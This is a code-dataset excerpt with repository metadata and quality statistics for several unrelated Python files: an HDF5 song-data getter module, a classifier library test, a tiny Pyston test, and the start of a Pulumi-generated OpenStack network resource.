h5.root.metadata.similar_artists[h5['metadata']['songs']['idx_similar_artists'][songidx]:] return h5.root.metadata.similar_artists[h5['metadata']['songs']['idx_similar_artists'][songidx]: h5['metadata']['songs']['idx_similar_artists'][songidx+1]] def get_artist_terms(h5,songidx=0): """ Get artist terms array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.artist_terms[h5['metadata']['songs']['idx_artist_terms'][songidx]:] return h5.root.metadata.artist_terms[h5['metadata']['songs']['idx_artist_terms'][songidx]: h5['metadata']['songs']['idx_artist_terms'][songidx+1]] def get_artist_terms_freq(h5,songidx=0): """ Get artist terms array frequencies. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.artist_terms_freq[h5['metadata']['songs']['idx_artist_terms'][songidx]:] return h5.root.metadata.artist_terms_freq[h5['metadata']['songs']['idx_artist_terms'][songidx]: h5['metadata']['songs']['idx_artist_terms'][songidx+1]] def get_artist_terms_weight(h5,songidx=0): """ Get artist terms array frequencies. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. 
To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.metadata.songs.nrows == songidx + 1: return h5.root.metadata.artist_terms_weight[h5['metadata']['songs']['idx_artist_terms'][songidx]:] return h5.root.metadata.artist_terms_weight[h5['metadata']['songs']['idx_artist_terms'][songidx]: h5['metadata']['songs']['idx_artist_terms'][songidx+1]] def get_analysis_sample_rate(h5,songidx=0): """ Get analysis sample rate from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['analysis_sample_rate'][songidx] def get_audio_md5(h5,songidx=0): """ Get audio MD5 from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['audio_md5'][songidx] def get_danceability(h5,songidx=0): """ Get danceability from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['danceability'][songidx] def get_duration(h5,songidx=0): """ Get duration from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['duration'][songidx] def get_end_of_fade_in(h5,songidx=0): """ Get end of fade in from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['end_of_fade_in'][songidx] def get_energy(h5,songidx=0): """ Get energy from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['energy'][songidx] def get_key(h5,songidx=0): """ Get key from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['key'][songidx] def get_key_confidence(h5,songidx=0): """ Get key confidence from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['key_confidence'][songidx] def get_loudness(h5,songidx=0): """ Get loudness from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['loudness'][songidx] def get_mode(h5,songidx=0): """ Get mode from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['mode'][songidx] def get_mode_confidence(h5,songidx=0): """ Get mode confidence from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['mode_confidence'][songidx] def get_start_of_fade_out(h5,songidx=0): """ Get start of fade out from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['start_of_fade_out'][songidx] def get_tempo(h5,songidx=0): """ Get tempo from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['tempo'][songidx] def get_time_signature(h5,songidx=0): """ Get signature from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['time_signature'][songidx] def get_time_signature_confidence(h5,songidx=0): """ Get signature confidence from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['time_signature_confidence'][songidx] def get_track_id(h5,songidx=0): """ Get track id from a HDF5 song file, by default the first song in it """ return h5['analysis']['songs']['track_id'][songidx] def get_segments_start(h5,songidx=0): """ Get segments start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. 
To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_start[h5['analysis']['songs']['idx_segments_start'][songidx]:] return h5.root.analysis.segments_start[h5['analysis']['songs']['idx_segments_start'][songidx]: h5['analysis']['songs']['idx_segments_start'][songidx+1]] def get_segments_confidence(h5,songidx=0): """ Get segments confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_confidence[h5['analysis']['songs']['idx_segments_confidence'][songidx]:] return h5.root.analysis.segments_confidence[h5['analysis']['songs']['idx_segments_confidence'][songidx]: h5['analysis']['songs']['idx_segments_confidence'][songidx+1]] def get_segments_pitches(h5,songidx=0): """ Get segments pitches array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_pitches[h5['analysis']['songs']['idx_segments_pitches'][songidx]:,:] return h5.root.analysis.segments_pitches[h5['analysis']['songs']['idx_segments_pitches'][songidx]: h5['analysis']['songs']['idx_segments_pitches'][songidx+1],:] def get_segments_timbre(h5,songidx=0): """ Get segments timbre array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_timbre[h5['analysis']['songs']['idx_segments_timbre'][songidx]:,:] return h5.root.analysis.segments_timbre[h5['analysis']['songs']['idx_segments_timbre'][songidx]: h5['analysis']['songs']['idx_segments_timbre'][songidx+1],:] def get_segments_loudness_max(h5,songidx=0): """ Get segments loudness max array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_loudness_max[h5['analysis']['songs']['idx_segments_loudness_max'][songidx]:] return h5.root.analysis.segments_loudness_max[h5['analysis']['songs']['idx_segments_loudness_max'][songidx]: h5['analysis']['songs']['idx_segments_loudness_max'][songidx+1]] def get_segments_loudness_max_time(h5,songidx=0): """ Get segments loudness max time array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_loudness_max_time[h5['analysis']['songs']['idx_segments_loudness_max_time'][songidx]:] return h5.root.analysis.segments_loudness_max_time[h5['analysis']['songs']['idx_segments_loudness_max_time'][songidx]: h5['analysis']['songs']['idx_segments_loudness_max_time'][songidx+1]] def get_segments_loudness_start(h5,songidx=0): """ Get segments loudness start array. Takes care of the proper indexing if we are in aggregate file. 
By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.segments_loudness_start[h5['analysis']['songs']['idx_segments_loudness_start'][songidx]:] return h5.root.analysis.segments_loudness_start[h5['analysis']['songs']['idx_segments_loudness_start'][songidx]: h5['analysis']['songs']['idx_segments_loudness_start'][songidx+1]] def get_sections_start(h5,songidx=0): """ Get sections start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.sections_start[h5['analysis']['songs']['idx_sections_start'][songidx]:] return h5.root.analysis.sections_start[h5['analysis']['songs']['idx_sections_start'][songidx]: h5['analysis']['songs']['idx_sections_start'][songidx+1]] def get_sections_confidence(h5,songidx=0): """ Get sections confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.sections_confidence[h5['analysis']['songs']['idx_sections_confidence'][songidx]:] return h5.root.analysis.sections_confidence[h5['analysis']['songs']['idx_sections_confidence'][songidx]: h5['analysis']['songs']['idx_sections_confidence'][songidx+1]] def get_beats_start(h5,songidx=0): """ Get beats start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.beats_start[h5['analysis']['songs']['idx_beats_start'][songidx]:] return h5.root.analysis.beats_start[h5['analysis']['songs']['idx_beats_start'][songidx]: h5['analysis']['songs']['idx_beats_start'][songidx+1]] def get_beats_confidence(h5,songidx=0): """ Get beats confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.beats_confidence[h5['analysis']['songs']['idx_beats_confidence'][songidx]:] return h5.root.analysis.beats_confidence[h5['analysis']['songs']['idx_beats_confidence'][songidx]: h5['analysis']['songs']['idx_beats_confidence'][songidx+1]] def get_bars_start(h5,songidx=0): """ Get bars start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.bars_start[h5['analysis']['songs']['idx_bars_start'][songidx]:] return h5.root.analysis.bars_start[h5['analysis']['songs']['idx_bars_start'][songidx]: h5['analysis']['songs']['idx_bars_start'][songidx+1]] def get_bars_confidence(h5,songidx=0): """ Get bars start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. 
To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.bars_confidence[h5['analysis']['songs']['idx_bars_confidence'][songidx]:] return h5.root.analysis.bars_confidence[h5['analysis']['songs']['idx_bars_confidence'][songidx]: h5['analysis']['songs']['idx_bars_confidence'][songidx+1]] def get_tatums_start(h5,songidx=0): """ Get tatums start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.tatums_start[h5['analysis']['songs']['idx_tatums_start'][songidx]:] return h5.root.analysis.tatums_start[h5['analysis']['songs']['idx_tatums_start'][songidx]: h5['analysis']['songs']['idx_tatums_start'][songidx+1]] def get_tatums_confidence(h5,songidx=0): """ Get tatums confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.tatums_confidence[h5['analysis']['songs']['idx_tatums_confidence'][songidx]:] return h5.root.analysis.tatums_confidence[h5['analysis']['songs']['idx_tatums_confidence'][songidx]: h5['analysis']['songs']['idx_tatums_confidence'][songidx+1]] def get_artist_mbtags(h5,songidx=0): """ Get artist musicbrainz tag array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.musicbrainz.songs.nrows == songidx + 1: return h5.root.musicbrainz.artist_mbtags[h5['musicbrainz']['songs']['idx_artist_mbtags'][songidx]:] return h5.root.musicbrainz.artist_mbtags[h5['metadata']['songs']['idx_artist_mbtags'][songidx]: h5['metadata']['songs']['idx_artist_mbtags'][songidx+1]] def get_artist_mbtags_count(h5,songidx=0): """ Get artist musicbrainz tag count array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.musicbrainz.songs.nrows == songidx + 1: return h5.root.musicbrainz.artist_mbtags_count[h5['musicbrainz']['songs']['idx_artist_mbtags'][songidx]:] return h5.root.musicbrainz.artist_mbtags_count[h5['metadata']['songs']['idx_artist_mbtags'][songidx]: h5['metadata']['songs']['idx_artist_mbtags'][songidx+1]] def get_year(h5,songidx=0): """ Get release year from a HDF5 song file, by default the first song in it """ return h5['musicbrainz']['songs']['year'][songidx]
avg_line_length: 45.443277
max_line_length: 127
alphanum_fraction: 0.669456
qsc_*_quality_signal:
  code_num_words=3,114, code_num_chars=21,631, code_mean_word_length=4.540141,
  code_frac_words_unique=0.062942, code_frac_chars_top_2grams=0.043005,
  code_frac_chars_top_3grams=0.064719, code_frac_chars_top_4grams=0.049653,
  code_frac_chars_dupe_5grams=0.84234, code_frac_chars_dupe_6grams=0.767789,
  code_frac_chars_dupe_7grams=0.75237, code_frac_chars_dupe_8grams=0.70208,
  code_frac_chars_dupe_9grams=0.695006, code_frac_chars_dupe_10grams=0.691611,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0.023225,
  code_frac_chars_whitespace=0.20577, code_size_file_byte=21,631,
  code_num_lines=476, code_num_chars_line_max=128, code_num_chars_line_mean=45.443277,
  code_frac_chars_alphabet=0.799709, code_frac_chars_comments=0.384957,
  code_cate_xml_start=0, code_frac_lines_dupe_lines=0.146893, code_cate_autogen=0,
  code_frac_lines_long_string=0, code_frac_chars_string_length=0.234614,
  code_frac_chars_long_word_length=0.038424, code_frac_lines_string_concat=0,
  code_cate_encoded_data=0, code_frac_chars_hex_words=0,
  code_frac_lines_prompt_comments=0, code_frac_lines_assert=0,
  codepython_cate_ast=1, codepython_frac_lines_func_ratio=0.316384,
  codepython_cate_var_zero=false, codepython_frac_lines_pass=0,
  codepython_frac_lines_import=0.011299, codepython_frac_lines_simplefunc=0,
  codepython_score_lines_no_logic=0.762712, codepython_frac_lines_print=0
qsc_* (no _quality_signal suffix):
  code_num_words=0, code_num_chars=0, code_mean_word_length=0,
  code_frac_words_unique=null, code_frac_chars_top_2grams=0,
  code_frac_chars_top_3grams=0, code_frac_chars_top_4grams=0,
  code_frac_chars_dupe_5grams=1, code_frac_chars_dupe_6grams=1,
  code_frac_chars_dupe_7grams=1, code_frac_chars_dupe_8grams=1,
  code_frac_chars_dupe_9grams=0, code_frac_chars_dupe_10grams=1,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0, code_size_file_byte=0, code_num_lines=0,
  code_num_chars_line_max=0, code_num_chars_line_mean=0,
  code_frac_chars_alphabet=0, code_frac_chars_comments=0, code_cate_xml_start=0,
  code_frac_lines_dupe_lines=0, code_cate_autogen=0, code_frac_lines_long_string=0,
  code_frac_chars_string_length=0, code_frac_chars_long_word_length=0,
  code_frac_lines_string_concat=null, code_cate_encoded_data=0,
  code_frac_chars_hex_words=0, code_frac_lines_prompt_comments=0,
  code_frac_lines_assert=0, codepython_cate_ast=0,
  codepython_frac_lines_func_ratio=1, codepython_cate_var_zero=0,
  codepython_frac_lines_pass=0, codepython_frac_lines_import=0,
  codepython_frac_lines_simplefunc=0, codepython_score_lines_no_logic=1,
  codepython_frac_lines_print=0
effective: 0
hits: 7

hexsha: 06d485f59a472517a93e4401cc85c6a646dd1ca9
size: 3,114
ext: py
lang: Python
max_stars_repo_path: tags_classifier_library/predict/tests/test_utils.py
max_stars_repo_name: uktrade/tags-classifier-library
max_stars_repo_head_hexsha: 1496d3b64789438ab329497a8b150f3deb74d7d0
max_stars_repo_licenses: [ "MIT" ]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: tags_classifier_library/predict/tests/test_utils.py
max_issues_repo_name: uktrade/tags-classifier-library
max_issues_repo_head_hexsha: 1496d3b64789438ab329497a8b150f3deb74d7d0
max_issues_repo_licenses: [ "MIT" ]
max_issues_count: 1
max_issues_repo_issues_event_min_datetime: 2021-01-26T14:45:35.000Z
max_issues_repo_issues_event_max_datetime: 2021-01-26T14:45:35.000Z
max_forks_repo_path: tags_classifier_library/predict/tests/test_utils.py
max_forks_repo_name: uktrade/tags-classifier-library
max_forks_repo_head_hexsha: 1496d3b64789438ab329497a8b150f3deb74d7d0
max_forks_repo_licenses: [ "MIT" ]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
from tags_classifier_library.predict.model import ModelInfo, inspect_model
from tags_classifier_library.predict.tests.constants import TEST_MODELS_PATH


def test_inspect_model():
    models_info = inspect_model(TEST_MODELS_PATH, ["models_general"])
    models_info.sort(key=lambda x: x.name)
    assert models_info == [
        ModelInfo(name="Alpha", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Alpha", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Beta", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Beta", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Charlie", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Charlie", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Delta", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Delta", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Echo", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Echo", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Foxtrot", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Foxtrot", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Golf", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Golf", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Hotel", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Hotel", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="India", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/India", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
        ModelInfo(name="Juliett", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Juliett", group_path="./tags_classifier_library/predict/tests/models_test/models_general"),
    ]
avg_line_length: 43.859155
max_line_length: 94
alphanum_fraction: 0.650289
qsc_*_quality_signal:
  code_num_words=325, code_num_chars=3,114, code_mean_word_length=5.873846,
  code_frac_words_unique=0.104615, code_frac_chars_top_2grams=0.211105,
  code_frac_chars_top_3grams=0.242012, code_frac_chars_top_4grams=0.322682,
  code_frac_chars_dupe_5grams=0.846517, code_frac_chars_dupe_6grams=0.810372,
  code_frac_chars_dupe_7grams=0.810372, code_frac_chars_dupe_8grams=0.810372,
  code_frac_chars_dupe_9grams=0.810372, code_frac_chars_dupe_10grams=0.810372,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0.238279, code_size_file_byte=3,114,
  code_num_lines=70, code_num_chars_line_max=95, code_num_chars_line_mean=44.485714,
  code_frac_chars_alphabet=0.804806, code_frac_chars_comments=0,
  code_cate_xml_start=0, code_frac_lines_dupe_lines=0.597015, code_cate_autogen=0,
  code_frac_lines_long_string=0, code_frac_chars_string_length=0.510597,
  code_frac_chars_long_word_length=0.444123, code_frac_lines_string_concat=0,
  code_cate_encoded_data=0, code_frac_chars_hex_words=0,
  code_frac_lines_prompt_comments=0, code_frac_lines_assert=0.014925,
  codepython_cate_ast=1, codepython_frac_lines_func_ratio=0.014925,
  codepython_cate_var_zero=false, codepython_frac_lines_pass=0,
  codepython_frac_lines_import=0.029851, codepython_frac_lines_simplefunc=0,
  codepython_score_lines_no_logic=0.044776, codepython_frac_lines_print=0
qsc_* (no _quality_signal suffix):
  code_num_words=0, code_num_chars=0, code_mean_word_length=0,
  code_frac_words_unique=null, code_frac_chars_top_2grams=1,
  code_frac_chars_top_3grams=1, code_frac_chars_top_4grams=1,
  code_frac_chars_dupe_5grams=1, code_frac_chars_dupe_6grams=1,
  code_frac_chars_dupe_7grams=1, code_frac_chars_dupe_8grams=1,
  code_frac_chars_dupe_9grams=1, code_frac_chars_dupe_10grams=1,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0, code_size_file_byte=0, code_num_lines=0,
  code_num_chars_line_max=0, code_num_chars_line_mean=0,
  code_frac_chars_alphabet=0, code_frac_chars_comments=0, code_cate_xml_start=0,
  code_frac_lines_dupe_lines=0, code_cate_autogen=0, code_frac_lines_long_string=0,
  code_frac_chars_string_length=0, code_frac_chars_long_word_length=1,
  code_frac_lines_string_concat=null, code_cate_encoded_data=0,
  code_frac_chars_hex_words=0, code_frac_lines_prompt_comments=0,
  code_frac_lines_assert=0, codepython_cate_ast=0,
  codepython_frac_lines_func_ratio=0, codepython_cate_var_zero=0,
  codepython_frac_lines_pass=0, codepython_frac_lines_import=0,
  codepython_frac_lines_simplefunc=0, codepython_score_lines_no_logic=0,
  codepython_frac_lines_print=0
effective: 0
hits: 10

hexsha: b01a3c66782537d7e83404fd91ab9b7e3a107bbd
size: 93
ext: py
lang: Python
max_stars_repo_path: test/tests/sys_modules_replacement_test.py
max_stars_repo_name: aisk/pyston
max_stars_repo_head_hexsha: ac69cfef0621dbc8901175e84fa2b5cb5781a646
max_stars_repo_licenses: [ "BSD-2-Clause", "Apache-2.0" ]
max_stars_count: 1
max_stars_repo_stars_event_min_datetime: 2020-02-06T14:28:45.000Z
max_stars_repo_stars_event_max_datetime: 2020-02-06T14:28:45.000Z
max_issues_repo_path: test/tests/sys_modules_replacement_test.py
max_issues_repo_name: aisk/pyston
max_issues_repo_head_hexsha: ac69cfef0621dbc8901175e84fa2b5cb5781a646
max_issues_repo_licenses: [ "BSD-2-Clause", "Apache-2.0" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: test/tests/sys_modules_replacement_test.py
max_forks_repo_name: aisk/pyston
max_forks_repo_head_hexsha: ac69cfef0621dbc8901175e84fa2b5cb5781a646
max_forks_repo_licenses: [ "BSD-2-Clause", "Apache-2.0" ]
max_forks_count: 1
max_forks_repo_forks_event_min_datetime: 2020-02-06T14:29:00.000Z
max_forks_repo_forks_event_max_datetime: 2020-02-06T14:29:00.000Z
content:
import sys_modules_replacement_target
print hasattr(sys_modules_replacement_target, "path")
avg_line_length: 23.25
max_line_length: 53
alphanum_fraction: 0.88172
qsc_*_quality_signal:
  code_num_words=12, code_num_chars=93, code_mean_word_length=6.333333,
  code_frac_words_unique=0.666667, code_frac_chars_top_2grams=0.263158,
  code_frac_chars_top_3grams=0.552632, code_frac_chars_top_4grams=0.710526,
  code_frac_chars_dupe_5grams=0, code_frac_chars_dupe_6grams=0,
  code_frac_chars_dupe_7grams=0, code_frac_chars_dupe_8grams=0,
  code_frac_chars_dupe_9grams=0, code_frac_chars_dupe_10grams=0,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0.064516, code_size_file_byte=93,
  code_num_lines=3, code_num_chars_line_max=54, code_num_chars_line_mean=31,
  code_frac_chars_alphabet=0.873563, code_frac_chars_comments=0,
  code_cate_xml_start=0, code_frac_lines_dupe_lines=0, code_cate_autogen=0,
  code_frac_lines_long_string=0, code_frac_chars_string_length=0.043011,
  code_frac_chars_long_word_length=0, code_frac_lines_string_concat=0,
  code_cate_encoded_data=0, code_frac_chars_hex_words=0,
  code_frac_lines_prompt_comments=0, code_frac_lines_assert=0,
  codepython_cate_ast=0, codepython_frac_lines_func_ratio=null,
  codepython_cate_var_zero=null, codepython_frac_lines_pass=0,
  codepython_frac_lines_import=0.5, codepython_frac_lines_simplefunc=null,
  codepython_score_lines_no_logic=null, codepython_frac_lines_print=0.5
qsc_* (no _quality_signal suffix):
  code_num_words=1, code_num_chars=0, code_mean_word_length=0,
  code_frac_words_unique=null, code_frac_chars_top_2grams=1,
  code_frac_chars_top_3grams=1, code_frac_chars_top_4grams=1,
  code_frac_chars_dupe_5grams=0, code_frac_chars_dupe_6grams=0,
  code_frac_chars_dupe_7grams=0, code_frac_chars_dupe_8grams=0,
  code_frac_chars_dupe_9grams=0, code_frac_chars_dupe_10grams=0,
  code_frac_chars_replacement_symbols=0, code_frac_chars_digital=0,
  code_frac_chars_whitespace=0, code_size_file_byte=0, code_num_lines=1,
  code_num_chars_line_max=0, code_num_chars_line_mean=0,
  code_frac_chars_alphabet=0, code_frac_chars_comments=0, code_cate_xml_start=0,
  code_frac_lines_dupe_lines=0, code_cate_autogen=0, code_frac_lines_long_string=0,
  code_frac_chars_string_length=0, code_frac_chars_long_word_length=0,
  code_frac_lines_string_concat=null, code_cate_encoded_data=0,
  code_frac_chars_hex_words=0, code_frac_lines_prompt_comments=0,
  code_frac_lines_assert=0, codepython_cate_ast=1,
  codepython_frac_lines_func_ratio=0, codepython_cate_var_zero=0,
  codepython_frac_lines_pass=0, codepython_frac_lines_import=1,
  codepython_frac_lines_simplefunc=0, codepython_score_lines_no_logic=0,
  codepython_frac_lines_print=1
effective: 0
hits: 8

hexsha: c6967e5f3daf02a35553fdd623171262e05d1e55
size: 53,846
ext: py
lang: Python
max_stars_repo_path: sdk/python/pulumi_openstack/networking/network.py
max_stars_repo_name: pulumi/pulumi-openstack
max_stars_repo_head_hexsha: 945eed22a82784e9f0b3aa56168b2397c2f503e8
max_stars_repo_licenses: [ "ECL-2.0", "Apache-2.0" ]
max_stars_count: 34
max_stars_repo_stars_event_min_datetime: 2018-09-12T12:37:51.000Z
max_stars_repo_stars_event_max_datetime: 2022-02-04T19:32:13.000Z
max_issues_repo_path: sdk/python/pulumi_openstack/networking/network.py
max_issues_repo_name: pulumi/pulumi-openstack
max_issues_repo_head_hexsha: 945eed22a82784e9f0b3aa56168b2397c2f503e8
max_issues_repo_licenses: [ "ECL-2.0", "Apache-2.0" ]
max_issues_count: 72
max_issues_repo_issues_event_min_datetime: 2018-08-15T13:04:57.000Z
max_issues_repo_issues_event_max_datetime: 2022-03-31T15:39:49.000Z
max_forks_repo_path: sdk/python/pulumi_openstack/networking/network.py
max_forks_repo_name: pulumi/pulumi-openstack
max_forks_repo_head_hexsha: 945eed22a82784e9f0b3aa56168b2397c2f503e8
max_forks_repo_licenses: [ "ECL-2.0", "Apache-2.0" ]
max_forks_count: 7
max_forks_repo_forks_event_min_datetime: 2019-03-14T08:28:49.000Z
max_forks_repo_forks_event_max_datetime: 2021-12-29T04:23:55.000Z
content:
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['NetworkArgs', 'Network'] @pulumi.input_type class NetworkArgs: def __init__(__self__, *, admin_state_up: Optional[pulumi.Input[bool]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None): """ The set of arguments for constructing a Network resource. :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the name of the existing network. :param pulumi.Input[str] dns_domain: The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. :param pulumi.Input[int] mtu: The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network. :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy. :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. 
